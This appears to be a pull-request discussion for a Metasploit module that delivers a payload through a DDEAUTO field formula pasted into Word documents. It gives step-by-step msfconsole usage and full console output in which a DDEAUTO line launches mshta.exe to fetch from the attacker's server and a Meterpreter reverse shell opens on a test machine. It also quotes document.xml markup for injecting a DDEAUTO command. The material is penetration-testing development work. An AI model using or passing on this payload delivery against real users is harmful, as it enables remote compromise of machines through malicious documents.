Office DDE WORD Payload Delivery Server

[ghost]

This module generates a Quick parts field formula to embed into MS docs for payload delivery

Notes

I would put this under fileformat directory, although since I've been unable to generate doc ( if anyone could point me in the right direction, happy to ) for delivery, and therein the module does not exploit any flaws just "features", so figured atm it would qualify as a script.

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use exploit/windows/script/dde_delivery
• set PAYLOAD windows/meterpreter/reverse_tcp
• `set LHOST
• `set LPORT
• run
• Verify server starts properly, & quick parts correct field formula
• Embed Open up an MS doc manually (unfortunately havent figured out how to generate one) and embed with CTRL+F9 & paste OR go to INSERT > QUICK PARTS > FIELD > FORMULA (ENTER)
  & paste
• Close document, then reopen, should receive office_dde_delivery - Delivering payload
• SHELL!

Example

msf > use exploit/windows/script/office_dde_delivery
msf exploit(office_dde_delivery) > show options

Module options (exploit/windows/script/office_dde_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(office_dde_delivery) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(office_dde_delivery) > set LHOST eth0
LHOST => 192.168.0.11
msf exploit(office_dde_delivery) > set LPORT 14313
LPORT => 14313
msf exploit(office_dde_delivery) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.0.11:14313
[*] Using URL: http://0.0.0.0:8080/D77nWOo
[*] Local IP: http://192.168.0.11:8080/D77nWOo
[*] Server started.
[*] Place the following DDE in an MS document:
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe "http://192.168.0.11:8080/D77nWOo"
msf exploit(office_dde_delivery) > [*] 192.168.0.12     office_dde_delivery - Delivering payload
[*] Sending stage (179267 bytes) to 192.168.0.12
[*] Meterpreter session 1 opened (192.168.0.11:14313 -> 192.168.0.12:51116) at 2017-10-24 08:32:40 -0400
sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : TEST-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >

[wvu]

"Generate" might be a strong word. I'd take a look at @wchen-r7's work on macros. He has a series of templates that he uses. Perhaps you can use the same for DDE.

Take a look at exploit/multi/fileformat/office_word_macro.

[ghost]

Will do.

[ghost]

Just gotta figure out how to add <w:fldChar w:fldCharType="begin"/></w:r><w:r><w:instrText xml:space="preserve"> DDEAUTO c:\\Windows\\System32\\cmd.exe "/k calc.exe"</w:instrText> (example) after w:RSIDDEFAULT and <w:instrText xml:space="preserve"> </w:instrText></w:r><w:r><w:fldChar w:fldCharType="end"/> after bookmarkend in document.xml and will work..hm

[wchen-r7]

oh yeah if you are building an office doc, you can look at some of our examples. Thanks @wvu for pointing it out.

I built the macro exploit basically by creating a doc with Microsoft, and then I studied the format from there. Building a doc can be kind of complicated because there are a lot of files, and there are a lot of references you need to track, and Office doesn't really tell you what's wrong with your document. I recommend using this tool as your "debugger" for building a docx:
https://www.microsoft.com/en-us/download/details.aspx?id=30425

I hope this helps!

[ghost]

Yes it helps immensely, thank you :D. might just go for what I saw with inject_payload function in your module just gotta figure out the syntax of the parser.